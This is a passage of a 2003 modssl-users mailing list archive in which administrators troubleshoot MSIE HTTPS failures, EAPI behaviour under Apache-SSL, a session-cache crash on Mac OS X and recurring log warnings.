> Any suggestions are welcome.
> 
> -Torvald
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Sven Geisler 
AEC/communications GmbH

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 25 09:51:52 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2EF80A8971; Thu, 25 Sep 2003 09:51:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id A70B2A893E
	for ; Thu, 25 Sep 2003 09:51:35 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id h8P7pYOK028310
	for ; Thu, 25 Sep 2003 09:51:34 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id h8P7pXkm025029
	for ; Thu, 25 Sep 2003 09:51:34 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: Https problems with MSIE
Date: Thu, 25 Sep 2003 09:51:33 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Https problems with MSIE
Importance: normal
thread-index: AcODLQ5VCpS6xNphSX6hkjc3x6IZeAADI+/A
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Torvald Baade Bringsvor [mailto:Torvald.Bringsvor@ergo.no]
>Sent: Donnerstag, 25. September 2003 08:19
>To: 'modssl-users@modssl.org'
>Subject: Https problems with MSIE
>
>
>Hello.
>
>We have a user with MSIE 6.00.2800.1106 who is unable to=20
>connect to one of
>the sites we are hosting (https://www.lindorffd.com). He is=20
>using Windows
>2000 SP3.

I have exactly the same version of browser (6.00.2800.1106) and can
confirm I connected successfully about 3 minutes ago.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

>
>Have any of you had problems with MSIE 6.0 browsers?
>
>I have seen suggestions to disable SSLv3, but wouldnt that=20
>adversely affect
>other users?
>
>Any suggestions are welcome.
>
>-Torvald
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange.
This e-mail is of a private and personal nature. It is not related to
the exchange or business activities of the SWX Swiss Exchange. Le
pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport avec
l'activit=E9 boursi=E8re de la SWX Swiss Exchange.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 25 10:24:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 04404A8966; Thu, 25 Sep 2003 10:24:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id 3FA2DA893E
	for ; Thu, 25 Sep 2003 10:24:36 +0200 (CEST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id ; Thu, 25 Sep 2003 10:24:34 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: RE: Https problems with MSIE
Date: Thu, 25 Sep 2003 10:24:33 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



You can find a tip regarding the MSIE issue at
.

--I have already done this, to get MSIE 5.0 browsers to work.

I also discovered that the newest MSIE has more trouble with mod_ssl
than other browsers.
We saw that a MS Proxy Server (or MS ISA Server) with enabled
authentification using NTLM increase the issue.

We use the another way to resolve the MSIE keepalive issue. We have set
up a KeepaliveTimeout of 120 seconds.
The apache server may need more memory resources because there are more
open apache processes to cope with the longer timeout.

--Hmmm... but the FAQ mentioned the "nokeepalive" option, wouldnt that
cancel the KeepAliveTimeout??

-Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 25 11:14:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2900A8971; Thu, 25 Sep 2003 11:14:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.aeccom.com (gate1.aeccom.com [213.61.120.228])
	by master.modssl.org (Postfix) with ESMTP id 6C5EDA893E
	for ; Thu, 25 Sep 2003 11:14:27 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.aeccom.com (Postfix) with ESMTP id 3C4071BEBC
	for ; Thu, 25 Sep 2003 11:14:26 +0200 (CEST)
Received: from mail2.aeccom.com (gate2.aeccom.com [212.202.101.158])
	by mail.aeccom.com (Postfix) with ESMTP id BDFD71BEB7
	for ; Thu, 25 Sep 2003 11:14:25 +0200 (CEST)
Received: from andes.core.aeccom.com (andes.core.aeccom.com [192.168.2.14])
	by mail2.aeccom.com (Postfix) with ESMTP id 71C525C
	for ; Thu, 25 Sep 2003 11:14:25 +0200 (CEST)
Subject: RE: Https problems with MSIE
From: Sven Geisler 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain
Organization: AEC/communications GmbH
Message-Id: <1064481265.27354.40.camel@andes.core.aeccom.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) 
Date: 25 Sep 2003 11:14:25 +0200
Content-Transfer-Encoding: 7bit
X-Virus-Scanned-By: AMaViS-ng 0.1.6.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sven Geisler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Am Don, 2003-09-25 um 10.24 schrieb Torvald Baade Bringsvor:
> You can find a tip regarding the MSIE issue at
> .
> 
> --I have already done this, to get MSIE 5.0 browsers to work.
> 
> I also discovered that the newest MSIE has more trouble with mod_ssl
> than other browsers.
> We saw that a MS Proxy Server (or MS ISA Server) with enabled
> authentification using NTLM increase the issue.
> 
> We use the another way to resolve the MSIE keepalive issue. We have set
> up a KeepaliveTimeout of 120 seconds.
> The apache server may need more memory resources because there are more
> open apache processes to cope with the longer timeout.
> 
> --Hmmm... but the FAQ mentioned the "nokeepalive" option, wouldnt that
> cancel the KeepAliveTimeout??

Yup. But did you aktivate "nokeepalive" for MSIE as discribed in the
FAQ?
We activate the Keepalive feature for all MSIE against the FAQ to
provide a more performanter connection.

Sven.

> 
> -Torvald
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Sven Geisler 
AEC/communications GmbH

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 26 04:49:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E0812A8945; Fri, 26 Sep 2003 04:49:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from superspawn.javien.com (javien1.spots.ab.ca [209.115.168.130])
	by master.modssl.org (Postfix) with ESMTP id 6A01AA8936
	for ; Fri, 26 Sep 2003 04:49:26 +0200 (CEST)
Received: from KEN-NT.javien.com (h68-146-161-64.cg.shawcable.net [68.146.161.64])
	by superspawn.javien.com (8.11.6/8.11.6) with ESMTP id h8Q2nLK32748
	for ; Thu, 25 Sep 2003 20:49:22 -0600
Message-Id: <4.3.2.7.2.20030925204023.0261b008@127.0.0.1>
X-Sender: mail.javien.com:ken@127.0.0.1
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Thu, 25 Sep 2003 20:50:52 -0600
To: modssl-users@modssl.org
From: Ken Kittlitz 
Subject: ap_http_method(r) not working
In-Reply-To: <20030924163740.GC27273@toftum.dk>
References: <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
 <004101c380f0$e8e16da0$0200a8c0@com>
 <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Kittlitz 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi folks,

Any idea what would cause the "ap:http:method" context key that 
ap_http_method tries to query not to get set during an HTTPS request?  In 
other words, the following #define from httpd.h:

#define ap_http_method(r)   (((r)->ctx != NULL && ap_ctx_get((r)->ctx, 
"ap::http::method") != NULL) ? ((char *)ap_ctx_get((r)->ctx, 
"ap::http::method")) : "http")

always returns the defalt "http".  ap_default_port suffers a similar 
problem. The Apache I'm running is a 1.3 version obtained from an 
'apache-ssl' Debian package.  It handles HTTPS request just fine, but you'd 
never guess that from calling ap_http_method :-/

The binary's compile settings are below.  Any help would be 
appreciated.  Thanks!

/usr/sbin/apache-ssl -V
Server version: Apache/1.3.27 Ben-SSL/1.48 (Unix) Debian GNU/Linux
Server built:   Jun 26 2003 16:53:19
Server's Module Magic Number: 19990320:13
Server compiled with....
  -D EAPI
  -D HAVE_MMAP
  -D HAVE_SHMGET
  -D USE_SHMGET_SCOREBOARD
  -D USE_MMAP_FILES
  -D NO_WRITEV
  -D HAVE_FCNTL_SERIALIZED_ACCEPT
  -D HAVE_SYSVSEM_SERIALIZED_ACCEPT
  -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
  -D HARD_SERVER_LIMIT=4096
  -D HTTPD_ROOT="/usr"
  -D SUEXEC_BIN="/usr/lib/apache-ssl/suexec"
  -D DEFAULT_PIDLOG="/var/run/apache-ssl.pid"
  -D DEFAULT_SCOREBOARD="/var/run/apache-ssl.scoreboard"
  -D DEFAULT_LOCKFILE="/var/run/apache-ssl.lock"
  -D DEFAULT_ERRORLOG="/var/log/apache-ssl/error.log"
  -D TYPES_CONFIG_FILE="/etc/mime.types"
  -D SERVER_CONFIG_FILE="/etc/apache-ssl/httpd.conf"
  -D ACCESS_CONFIG_FILE="/etc/apache-ssl/access.conf"
  -D RESOURCE_CONFIG_FILE="/etc/apache-ssl/srm.conf"
---
Ken Kittlitz
Vice-President, Javien Canada Inc.
http://www.javien.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 26 04:57:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D6B16A8945; Fri, 26 Sep 2003 04:57:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (mail.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 04B0BA8939
	for ; Fri, 26 Sep 2003 04:56:53 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.8/UVACS-2003031900) with ESMTP id h8Q2uiCa005637;
	Thu, 25 Sep 2003 22:56:44 -0400 (EDT)
Date: Thu, 25 Sep 2003 22:56:44 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: Ken Kittlitz 
Cc: modssl-users@modssl.org
Subject: Re: ap_http_method(r) not working
In-Reply-To: <4.3.2.7.2.20030925204023.0261b008@127.0.0.1>
Message-ID: 
References: <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
 <004101c380f0$e8e16da0$0200a8c0@com> <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
 <4.3.2.7.2.20030925204023.0261b008@127.0.0.1>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 25 Sep 2003, Ken Kittlitz wrote:

> #define ap_http_method(r)   (((r)->ctx != NULL && ap_ctx_get((r)->ctx,
> "ap::http::method") != NULL) ? ((char *)ap_ctx_get((r)->ctx,
> "ap::http::method")) : "http")
>
> always returns the defalt "http".  ap_default_port suffers a similar
> problem. The Apache I'm running is a 1.3 version obtained from an
> 'apache-ssl' Debian package.  It handles HTTPS request just fine, but you'd
> never guess that from calling ap_http_method :-/
>
> The binary's compile settings are below.  Any help would be
> appreciated.  Thanks!
>
> /usr/sbin/apache-ssl -V
> Server version: Apache/1.3.27 Ben-SSL/1.48 (Unix) Debian GNU/Linux
> Server built:   Jun 26 2003 16:53:19
> Server's Module Magic Number: 19990320:13
> Server compiled with....
>   -D EAPI
>   -D HAVE_MMAP
>   ...


Why in the world would Debian ship an Apache-SSL package with EAPI
support???  Maybe it's for backward binary compatibility with an older
Debian distro that used mod_ssl?  Anyway, certainly the reason this is not
working right is that Apache-SSL (aka Ben-SSL) (as opposed to mod_ssl,
which is the one supported by this mailing list) does not use EAPI at all,
so it would not be calling the appropriate EAPI hooks at the right time to
get those ctx variables set.

Start from scratch with a stock Apache build (and get 1.3.28 while you're
at it), and install mod_ssl from www.modssl.org.  Then your EAPI will work
right.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 26 05:07:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 99993A8945; Fri, 26 Sep 2003 05:07:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from superspawn.javien.com (javien1.spots.ab.ca [209.115.168.130])
	by master.modssl.org (Postfix) with ESMTP id A8B35A8936
	for ; Fri, 26 Sep 2003 05:07:37 +0200 (CEST)
Received: from KEN-NT.javien.com (h68-146-161-64.cg.shawcable.net [68.146.161.64])
	by superspawn.javien.com (8.11.6/8.11.6) with ESMTP id h8Q37XK01391
	for ; Thu, 25 Sep 2003 21:07:34 -0600
Message-Id: <4.3.2.7.2.20030925210435.0265f880@127.0.0.1>
X-Sender: mail.javien.com:ken@127.0.0.1
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Thu, 25 Sep 2003 21:09:04 -0600
To: modssl-users@modssl.org
From: Ken Kittlitz 
Subject: Re: ap_http_method(r) not working
In-Reply-To: 
References: <4.3.2.7.2.20030925204023.0261b008@127.0.0.1>
 <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
 <004101c380f0$e8e16da0$0200a8c0@com>
 <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
 <4.3.2.7.2.20030925204023.0261b008@127.0.0.1>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Kittlitz 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

At 10:56 PM 9/25/2003 -0400, Cliff Woolley wrote:
>  Anyway, certainly the reason this is not
>working right is that Apache-SSL (aka Ben-SSL) (as opposed to mod_ssl,
>which is the one supported by this mailing list) does not use EAPI at all,
>so it would not be calling the appropriate EAPI hooks at the right time to
>get those ctx variables set.

Yup, that would explain it... thanks.

>Start from scratch with a stock Apache build (and get 1.3.28 while you're
>at it), and install mod_ssl from www.modssl.org.  Then your EAPI will work
>right.

Yeah, I normally use mod_ssl and have never had a problem;  it's the 
customer who decided to install Ben-SSL on their system.  Mea culpa for not 
realizing it was unrelated to mod_ssl. I'll try to show them the light ;-)
---
Ken Kittlitz
Vice-President, Javien Canada Inc.
http://www.javien.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 29 11:53:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1B717A8972; Mon, 29 Sep 2003 11:53:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mojito.idtect.net (ATuileries-102-2-1-196.w193-251.abo.wanadoo.fr [193.251.178.196])
	by master.modssl.org (Postfix) with ESMTP id 5D999A8941
	for ; Mon, 29 Sep 2003 11:53:36 +0200 (CEST)
Received: from idtect.com (localhost [127.0.0.1])
	by mojito.idtect.net (8.12.9-20030917/8.12.9) with ESMTP id h8T9rZIO009148
	for ; Mon, 29 Sep 2003 11:53:35 +0200
Message-ID: <3F78011F.4020702@idtect.com>
Date: Mon, 29 Sep 2003 11:53:35 +0200
From: Charles-Edouard Ruault 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624
X-Accept-Language: en-us, en, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: apache 1.3.28/modssl 2.8.15/openssl 0.9.6j crash on macos X
X-Enigmail-Version: 0.76.1.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Charles-Edouard Ruault 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

i've just stumbled over an annoying problem on macos X 10.2.6
I've recomplied from scratch
- openssl 0.9.6j
- modssl 2.8.15
- apache 1.3.28 ( using modssl own dbm implementation by specifyting the
--enable-rule=SSL_SDBM config flag ).


and i'm seeing random crashes of httpd when i access my webserver using
ssl ( for testing purposes i've used the default httpd.conf file ).
I managed to nail down the problem to the ssl session management routines.
To me more precise , here's what gdb says when the problem occurs :

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x90074898 in memmove ()
(gdb) bt
#0  0x90074898 in memmove ()
#1  0x900745a0 in memmove ()
#2  0x00338050 in ssl_scache_retrieve ()
#3  0x00330ea8 in ssl_callback_GetSessionCacheEntry ()
#4  0x002fb260 in ssl_get_prev_session ()
#5  0x002eb004 in ssl3_get_client_hello ()
#6  0x002ea848 in ssl3_accept ()
#7  0x002f4520 in ssl23_get_client_hello ()
#8  0x002f3df8 in ssl23_accept ()
#9  0x0032e0a8 in ssl_hook_NewConnection ()
#10 0x00006b28 in new_connection ()
#11 0x0000806c in child_main ()
#12 0x000083e0 in make_child ()
#13 0x000088dc in perform_idle_server_maintenance ()
#14 0x00009158 in standalone_main ()
#15 0x00009a2c in main ()
#16 0x0000266c in _start ()
#17 0x000024ec in start ()

Right now the workaround is to disable SSL session management (
SSLSessionCache        none instead of
SSLSessionCache        dbm:/Users/cruault/apache/var/run/ssl_scache ).

Has anyone seen this ? Any known fix ?
Thanks for your help.

-- 
Charles-Edouard Ruault
Idtect SA
http://www.idtect.com
+33-1-42-81-81-84




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 29 11:57:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A12CAA8941; Mon, 29 Sep 2003 11:57:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.254.14])
	by master.modssl.org (Postfix) with ESMTP id 922E8A893F
	for ; Mon, 29 Sep 2003 11:57:32 +0200 (CEST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2-X17 #30724)
 id <01L18G87OYYO00C9QO@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 29 Sep 2003 10:57:24 +0100 (BST)
Received: from imhub1.uni.mdx.ac.uk ([10.13.83.21])
 by mdx.ac.uk (PMDF V6.2-X17 #30724)
 with ESMTP id <01L18G7DX6YW00BJH9@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 29 Sep 2003 10:57:18 +0100 (BST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2-X17 #30840)
 id <01L18G68TNHS9C14BS@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 29 Sep 2003 10:55:48 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk
 (mdx-cpq-temp1.mdx.ac.uk [10.13.75.36]) by mdx.ac.uk (PMDF V6.2-X17 #30840)
 with ESMTP id <01L18G68OW8Q9ANL1N@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 29 Sep 2003 10:55:47 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Mon, 29 Sep 2003 10:48:51 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Mon,
 29 Sep 2003 10:48:50 +0000
Date: Mon, 29 Sep 2003 10:48:15 +0000
From: a.moon@mdx.ac.uk
Subject: apache 1.3.28/modssl 2.8.15/openssl 0.9.6j crash on macos X
To: modssl-users@modssl.org
Message-id: <68F372500D5@mdx-cpq-temp1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away until the 1st of October 2003.  
I will get back to you as soon as i can when I return.  
If the matter is urgent and concerns OASIS, MUBSWEB or MUBS Online 
then please contact one of the other members of the OLSU team.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 29 12:08:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6F597A8972; Mon, 29 Sep 2003 12:08:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 3F028A8934
	for ; Mon, 29 Sep 2003 12:08:27 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 644AA6E4013; Mon, 29 Sep 2003 12:08:22 +0200 (CEST)
Date: Mon, 29 Sep 2003 12:08:22 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: apache 1.3.28/modssl 2.8.15/openssl 0.9.6j crash on macos X
Message-ID: <20030929100822.GB1668@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3F78011F.4020702@idtect.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3F78011F.4020702@idtect.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

A couple of ideas - what happens if you don't ask for the internal
SDBM? If it works on your os, then MM should give better performance -
http://www.ossp.org/pkg/lib/mm/ Running make test should let you know
if it is a plausible way to go.

vh

Mads Toftum
-- 
Speaking at http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 30 05:06:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6E146A8940; Tue, 30 Sep 2003 05:06:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from www.atpmail.com (atpmail.com [216.55.187.46])
	by master.modssl.org (Postfix) with ESMTP id 334B2A8936
	for ; Tue, 30 Sep 2003 05:06:33 +0200 (CEST)
Received: from www.atpmail.com (atpmail.com [216.55.187.46])
	by www.atpmail.com (8.12.9/8.12.9) with ESMTP id h8U36VZQ004785
	for ; Mon, 29 Sep 2003 20:06:31 -0700 (PDT)
Received: (from alex@localhost)
	by www.atpmail.com (8.12.9/8.12.9/Submit) id h8U36VSc004782;
	Mon, 29 Sep 2003 20:06:31 -0700 (PDT)
Message-Id: <200309300306.h8U36VSc004782@www.atpmail.com>
To: modssl-users@modssl.org
From: "Alex Hart" 
Subject: Apache warning: Connection refused: connect to listener
Date: Mon, 29 Sep 2003 23:06:31 -0400
X-Mailer: "ATPmail, Version 5.20"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Hart" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I just installed Apache/2.0.47 (Unix) mod_ssl/2.0.47 OpenSSL/0.9.7b in
my server (freebsd 4.8) and everything seems to be working fine. I have apache
configured to serve both secure and insecure pages.

However, I keep getting the following line in my error log file (thousands of times):

[Wed Sep 24 12:51:15 2003] [warn] (61)Connection refused: connect to listener

I have thousands of these warnings now in just a couple of days. I can't figure out any pattern to them.
I get this warning even when I don't have any activity going on with the web server. 
It also happens if I don't have any SSL virtual hosts set up.
I notice no problems with any web pages, secure or not.

When I recompile apache without mod_ssl, the warning goes away.

I've scoured the Internet but I can't find a thing about this warning. Does anyone have any idea about why this is happening?

Alex Hart
http://atpmail.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 30 06:23:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C4874A8940; Tue, 30 Sep 2003 06:23:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id E279BA8936
	for ; Tue, 30 Sep 2003 06:23:21 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.8/UVACS-2003031900) with ESMTP id h8U4N6Ca017348;
	Tue, 30 Sep 2003 00:23:06 -0400 (EDT)
Date: Tue, 30 Sep 2003 00:23:06 -0400 (EDT)
From: Cliff Woolley 
